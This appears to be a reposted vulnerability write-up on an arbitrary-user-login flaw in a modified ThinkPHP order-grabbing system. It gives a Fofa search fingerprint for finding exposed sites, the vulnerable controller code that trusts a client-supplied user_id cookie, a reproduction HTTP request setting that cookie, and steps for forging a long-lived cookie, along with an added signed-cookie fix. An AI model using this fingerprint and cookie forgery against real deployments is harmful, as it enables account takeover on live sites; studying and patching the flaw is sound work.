0x00 Preface
Source overview: a modified ("secondary-developed") version of an overseas order-grabbing Shua-dan system with user risk score, stacking groups, injection and automatic order matching. This fork adds a user risk score and last-order time, ships with three-level distribution, a permission/agent backend, and a backend query feature for recharges and withdrawals.
Fofa: "/red/popper.min.js"
Framework: ThinkPHP 5.1.41, Debug: True, default admin backend: /admin/login
The user base is fairly large: Fofa returns about 10,000 results.
0x01 Vulnerability Analysis
The Base controller checks the server-side session first, but when no session exists it falls back to the client-supplied user_id cookie and treats that value as the logged-in user. Any request that sets Cookie: user_id=N is therefore handled as user N.
<?php
use think\App;
use think\Controller;

/**
 * Login verification controller
 */
class Base extends Controller
{
    protected $rule = ['__token__' => 'token'];
    protected $msg = ['__token__' => '无效token!'];
    protected $_uid;

    function __construct(App $app)
    {
        parent::__construct($app);
        if (config('shop_status') == 0) exit();
        // The server-side session is consulted first ...
        $uid = session('user_id');
        if (!$uid) {
            // ... but when it is empty the user id is read straight from a
            // client-controlled cookie, so whoever sends user_id=N becomes user N.
            $uid = cookie('user_id');
        }
        //echo App::VERSION;exit;
        /*if (request()->subDomain() == 'cs' || request()->subDomain() == '') {
            header('Location:' . 'https://www.' . request()->rootDomain());
            exit();
        }*/
        $controller = strtolower(request()->controller());
        if ($controller == 'user') return;
        if (!$uid && request()->isPost()) {
            $this->error(lang('no_login'));
        }
        if (!$uid) $this->redirect('User/login');
        $this->_uid = $uid;
    }
}
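A hardened replacement for the cookie fallback, added here as an example (not the project's or the author's code): the server signs the remember-me cookie, so the client cannot pick the user id. It assumes a hypothetical config key remember_secret holding a long random server secret; the cookie name remember_me and the layout uid.expires.hmac are constructed for this example.

```php
<?php
// Added example, not the project's code. Replaces the fallback
//     if (!$uid) { $uid = cookie('user_id'); }
// with a cookie the server signs, so the client cannot choose the uid.
// Assumptions: a hypothetical config key 'remember_secret' holds a long
// random server secret; the cookie name 'remember_me' and the layout
// "<uid>.<expires>.<hmac-sha256>" are constructed for this example.

/** Issue the remember-me cookie for a user who has just authenticated. */
function issueRememberCookie(int $uid, int $ttl = 7 * 86400): void
{
    $exp = time() + $ttl;
    $sig = hash_hmac('sha256', $uid . '|' . $exp, config('remember_secret'));
    cookie('remember_me', $uid . '.' . $exp . '.' . $sig, [
        'expire'   => $ttl,
        'httponly' => true,   // not readable by page scripts
        'secure'   => true,   // only sent over HTTPS
    ]);
}

/** Return the uid from a valid, unexpired remember-me cookie, else null. */
function uidFromRememberCookie(): ?int
{
    $raw = cookie('remember_me');
    if (!is_string($raw) || substr_count($raw, '.') !== 2) {
        return null;                              // absent or malformed
    }
    [$uid, $exp, $sig] = explode('.', $raw);
    if (!ctype_digit($uid) || !ctype_digit($exp) || (int)$exp < time()) {
        return null;                              // bad fields or expired
    }
    $secret = config('remember_secret');
    if (empty($secret)) {
        return null;                              // never accept unsigned ids
    }
    $expected = hash_hmac('sha256', $uid . '|' . $exp, $secret);
    // constant-time compare: a forged tag fails whatever its bytes are
    return hash_equals($expected, $sig) ? (int)$uid : null;
}

// In Base::__construct, in place of the vulnerable fallback:
//   $uid = session('user_id');
//   if (!$uid && ($uid = uidFromRememberCookie())) {
//       session('user_id', $uid);   // promote to a server-side session
//   }
```

Because every tag is keyed to remember_secret, rotating that secret invalidates all issued cookies at once; revoking a single user's cookie additionally needs the token recorded server-side.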
0x02 Vulnerability Reproduction
Payload:
GET /index/index HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Connection: keep-alive
Content-Length: 73
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: user_id=1
Host: 127.0.0.1:81
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
User-Token-Csrf: csrf66e28d7ebbffa
X-Requested-With: XMLHttpRequest
sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Using Chrome's F12 > Application > Storage > Cookies, or the EditCookie extension, a long-lived cookie can be forged directly.
Tags: code audit, 0day, penetration testing, system, generic, 0day, Xianyu, Zhuanzhuan, RCE
Disclaimer: the programs (methods) discussed in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear all legal and joint liability; the article's author and this official account assume no legal or joint liability. Please take note!!!
Originally published on the WeChat official account 星悦安全: A modified overseas order-grabbing Shua-dan system has an arbitrary user login vulnerability